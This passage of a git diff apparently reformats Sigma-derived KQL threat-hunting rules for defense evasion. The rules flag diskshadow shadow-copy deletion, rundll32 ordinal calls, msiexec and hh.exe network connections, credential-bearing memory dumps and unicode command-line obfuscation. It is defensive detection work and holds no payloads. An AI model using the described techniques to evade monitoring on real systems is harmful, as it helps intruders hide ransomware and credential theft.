"C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql index ab2561de..8ae99b14 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql @@ -1,11 +1,11 @@ -// Title: CodePage Modification Via MODE.COM -// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-01-19 -// Level: low -// Description: Detects a CodePage modification using the "mode.com" utility. -// This behavior has been used by threat actors behind Dharma ransomware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting - -DeviceProcessEvents +// Title: CodePage Modification Via MODE.COM +// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-19 +// Level: low +// Description: Detects a CodePage modification using the "mode.com" utility. +// This behavior has been used by threat actors behind Dharma ransomware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting + +DeviceProcessEvents | where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql index b35244e3..a158ba7a 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql @@ -1,12 +1,12 @@ -// Title: Diskshadow Child Process Spawned -// Author: Harjot Singh @cyb3rjy0t -// Date: 2023-09-15 -// Level: medium -// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting -// False Positives: -// - Likely from legitimate usage of Diskshadow in Interpreter mode. - -DeviceProcessEvents +// Title: Diskshadow Child Process Spawned +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-09-15 +// Level: medium +// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate usage of Diskshadow in Interpreter mode. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql index e997e57b..264c2921 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql @@ -1,12 +1,12 @@ -// Title: Diskshadow Script Mode Execution -// Author: Ivan Dyachkov, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting -// False Positives: -// - Likely from legitimate backup scripts - -DeviceProcessEvents +// Title: Diskshadow Script Mode Execution +// Author: Ivan Dyachkov, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate backup scripts + +DeviceProcessEvents | where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql index 7f88518a..b3b28d98 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql @@ -1,13 +1,13 @@ -// Title: DLL Call by Ordinal Via Rundll32.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-22 -// Level: medium -// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment. -// - Windows control panel elements have been identified as source (mmc). - -DeviceProcessEvents +// Title: DLL Call by Ordinal Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-22 +// Level: medium +// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment. +// - Windows control panel elements have been identified as source (mmc). + +DeviceProcessEvents | where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql index 9b5c93dc..ef3c52e4 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql @@ -1,14 +1,14 @@ -// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address -// Author: bartblaze -// Date: 2020-07-13 -// Level: medium -// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. -// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. -// An initial baseline is recommended before deployment. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting -// False Positives: -// - Communication to other corporate systems that use IP addresses from public address spaces - -DeviceNetworkEvents +// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address +// Author: bartblaze +// Date: 2020-07-13 +// Level: medium +// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. +// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +// An initial baseline is recommended before deployment. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql index 0928d6d1..9ac92f18 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql @@ -1,12 +1,12 @@ -// Title: DMP/HDMP File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-07 -// Level: low -// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.threat-hunting -// False Positives: -// - Likely during crashes of software - -DeviceFileEvents +// Title: DMP/HDMP File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-07 +// Level: low +// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Likely during crashes of software + +DeviceFileEvents | where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql index efea574b..913435b7 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql @@ -1,12 +1,12 @@ -// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-02 -// Level: medium -// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting -// False Positives: -// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies - -DeviceProcessEvents +// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-02 +// Level: medium +// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting +// False Positives: +// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies + +DeviceProcessEvents | where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql index 9bc12b94..ebe4e593 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql @@ -1,13 +1,13 @@ -// Title: File or Folder Permissions Modifications -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-23 -// Level: medium -// Description: Detects a file or folder's permissions being modified or tampered with. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting -// False Positives: -// - Users interacting with the files on their own (unlikely unless privileged users). -// - Dynatrace app - -DeviceProcessEvents +// Title: File or Folder Permissions Modifications +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-23 +// Level: medium +// Description: Detects a file or folder's permissions being modified or tampered with. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting +// False Positives: +// - Users interacting with the files on their own (unlikely unless privileged users). +// - Dynatrace app + +DeviceProcessEvents | where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql index 070e25d4..63deac6a 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql @@ -1,11 +1,11 @@ -// Title: Headless Process Launched Via Conhost.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-23 -// Level: medium -// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. -// The "--headless" flag hides the windows from the user upon execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting - -DeviceProcessEvents +// Title: Headless Process Launched Via Conhost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. +// The "--headless" flag hides the windows from the user upon execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting + +DeviceProcessEvents | where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql index 247d2d13..e24a39ac 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql @@ -1,12 +1,12 @@ -// Title: HH.EXE Initiated HTTP Network Connection -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-05 -// Level: medium -// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting -// False Positives: -// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events. - -DeviceNetworkEvents +// Title: HH.EXE Initiated HTTP Network Connection +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: medium +// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting +// False Positives: +// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events. + +DeviceNetworkEvents | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql index ed29b57e..56f403c9 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -1,14 +1,14 @@ -// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-12-01 -// Level: medium -// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. -// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. -// These can be used for example in decrypting malicious payload for defense evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting -// False Positives: -// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. - -DeviceProcessEvents +// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. +// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +// These can be used for example in decrypting malicious payload for defense evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceProcessEvents | where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql index 5676791a..30f4e16c 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Office Trusted Location Updated -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-21 -// Level: medium -// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting -// False Positives: -// - During office installations or setup, trusted locations are added, which will trigger this rule. - -DeviceRegistryEvents +// Title: Microsoft Office Trusted Location Updated +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: medium +// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting +// False Positives: +// - During office installations or setup, trusted locations are added, which will trigger this rule. + +DeviceRegistryEvents | where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql index e7d53510..6b91719e 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Workflow Compiler Execution -// Author: Nik Seetharaman, frack113 -// Date: 2019-01-16 -// Level: medium -// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting -// False Positives: -// - Legitimate MWC use (unlikely in modern enterprise environments) - -DeviceProcessEvents +// Title: Microsoft Workflow Compiler Execution +// Author: Nik Seetharaman, frack113 +// Date: 2019-01-16 +// Level: medium +// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate MWC use (unlikely in modern enterprise environments) + +DeviceProcessEvents | where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql index e2c4ffb4..d1b38a88 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql @@ -1,14 +1,14 @@ -// Title: Msiexec.EXE Initiated Network Connection Over HTTP -// Author: frack113 -// Date: 2022-01-16 -// Level: low -// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. -// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. -// Use this rule to hunt for potentially anomalous or suspicious communications. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting -// False Positives: -// - Likely - -DeviceNetworkEvents +// Title: Msiexec.EXE Initiated Network Connection Over HTTP +// Author: frack113 +// Date: 2022-01-16 +// Level: low +// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. +// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. +// Use this rule to hunt for potentially anomalous or suspicious communications. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting +// False Positives: +// - Likely + +DeviceNetworkEvents | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql index 58fe2b64..5b0f2baa 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql @@ -1,14 +1,14 @@ -// Title: New Self Extracting Package Created Via IExpress.EXE -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-02-05 -// Level: medium -// Description: Detects the "iexpress.exe" utility creating self-extracting packages. -// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. -// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting -// False Positives: -// - Administrators building packages using iexpress.exe - -DeviceProcessEvents +// Title: New Self Extracting Package Created Via IExpress.EXE +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-02-05 +// Level: medium +// Description: Detects the "iexpress.exe" utility creating self-extracting packages. +// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. +// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Administrators building packages using iexpress.exe + +DeviceProcessEvents | where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql index b39d3ae1..0e74803a 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql @@ -1,12 +1,12 @@ -// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet -// Author: frack113 -// Date: 2024-05-03 -// Level: low -// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting -// False Positives: -// - Administrator script - -DeviceProcessEvents +// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet +// Author: frack113 +// Date: 2024-05-03 +// Level: low +// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting +// False Positives: +// - Administrator script + +DeviceProcessEvents | where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql index 7219b8ac..fc420363 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql @@ -1,11 +1,11 @@ -// Title: Potential CommandLine Obfuscation Using Unicode Characters -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-01-15 -// Level: medium -// Description: Detects potential CommandLine obfuscation using unicode characters. -// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting - -DeviceProcessEvents +// Title: Potential CommandLine Obfuscation Using Unicode Characters +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-01-15 +// Level: medium +// Description: Detects potential CommandLine obfuscation using unicode characters. +// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting + +DeviceProcessEvents | where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or 